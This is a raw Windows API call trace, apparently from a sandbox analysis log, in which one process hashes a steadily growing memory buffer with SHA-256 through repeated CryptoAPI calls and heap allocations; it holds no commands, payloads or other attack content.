	[0192.517] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.517] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0192.517] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.517] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301928
	[0192.517] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301928, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301928, pdwDataLen=0x1283b0) returned 1
	[0192.517] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.517] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.517] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.517] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.518] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0192.518] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.518] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301950
	[0192.518] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301950, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301950, pdwDataLen=0x1283b0) returned 1
	[0192.518] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.518] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.518] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.518] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.518] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0192.518] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.518] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301978
	[0192.518] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301978, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301978, pdwDataLen=0x1283b0) returned 1
	[0192.518] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.519] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.519] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.519] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.519] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0192.519] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.519] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23019a0
	[0192.519] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23019a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23019a0, pdwDataLen=0x1283b0) returned 1
	[0192.519] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.519] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.519] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.520] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.520] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0192.520] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.520] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23019c8
	[0192.520] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23019c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23019c8, pdwDataLen=0x1283b0) returned 1
	[0192.520] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.520] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.520] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.521] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.521] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0192.521] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.521] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23019f0
	[0192.521] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23019f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23019f0, pdwDataLen=0x1283b0) returned 1
	[0192.521] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.521] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.521] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.521] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.521] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0192.522] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.522] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301a18
	[0192.522] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301a18, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301a18, pdwDataLen=0x1283b0) returned 1
	[0192.522] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.522] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.522] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.522] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.522] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0192.522] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.522] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301a40
	[0192.522] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301a40, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301a40, pdwDataLen=0x1283b0) returned 1
	[0192.522] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.522] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.522] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.523] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.523] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0192.523] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.523] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301a68
	[0192.523] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301a68, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301a68, pdwDataLen=0x1283b0) returned 1
	[0192.523] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.523] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.523] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.524] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.524] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0192.524] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.524] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301a90
	[0192.524] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301a90, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301a90, pdwDataLen=0x1283b0) returned 1
	[0192.524] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.524] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.524] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.526] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.526] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0192.526] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301ab8
	[0192.527] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301ab8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301ab8, pdwDataLen=0x1283b0) returned 1
	[0192.527] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.527] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.527] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.527] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.527] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0192.527] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2639d8
	[0192.527] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2639d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2639d8, pdwDataLen=0x1283b0) returned 1
	[0192.527] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.527] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.527] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.528] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.528] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0192.528] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.528] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263780
	[0192.528] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263780, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263780, pdwDataLen=0x1283b0) returned 1
	[0192.528] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.528] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.528] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.529] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.529] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0192.529] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.529] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2636b8
	[0192.529] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2636b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2636b8, pdwDataLen=0x1283b0) returned 1
	[0192.529] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.529] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.529] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.530] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.530] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0192.530] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.530] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263758
	[0192.530] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263758, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263758, pdwDataLen=0x1283b0) returned 1
	[0192.530] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.530] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.530] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.530] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.530] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0192.531] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.531] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2637d0
	[0192.531] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2637d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2637d0, pdwDataLen=0x1283b0) returned 1
	[0192.531] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.531] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.531] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.531] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.531] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0192.531] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.531] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2636e0
	[0192.531] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2636e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2636e0, pdwDataLen=0x1283b0) returned 1
	[0192.531] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.531] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.531] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.532] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.532] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0192.532] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.532] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263640
	[0192.532] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263640, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263640, pdwDataLen=0x1283b0) returned 1
	[0192.532] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.532] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.532] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.533] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.533] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0192.533] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.533] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263690
	[0192.533] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263690, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263690, pdwDataLen=0x1283b0) returned 1
	[0192.533] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.533] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.533] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.534] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.534] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0192.534] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.534] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264e00
	[0192.534] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264e00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264e00, pdwDataLen=0x1283b0) returned 1
	[0192.534] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.534] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.534] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.534] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.534] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0192.535] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.535] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301ae0
	[0192.535] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301ae0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301ae0, pdwDataLen=0x1283b0) returned 1
	[0192.535] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.535] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.535] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.535] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.535] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0192.535] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.535] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301b08
	[0192.535] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301b08, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301b08, pdwDataLen=0x1283b0) returned 1
	[0192.535] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.535] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.535] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.536] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.536] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0192.536] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.537] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301b30
	[0192.537] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301b30, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301b30, pdwDataLen=0x1283b0) returned 1
	[0192.537] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.537] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.537] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.537] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.537] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0192.537] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.537] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301b58
	[0192.537] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301b58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301b58, pdwDataLen=0x1283b0) returned 1
	[0192.537] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.537] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.537] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.538] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.538] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0192.538] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.538] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301b80
	[0192.538] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301b80, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301b80, pdwDataLen=0x1283b0) returned 1
	[0192.538] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.538] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.538] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.539] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.539] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x8a0, dwFlags=0x0) returned 1
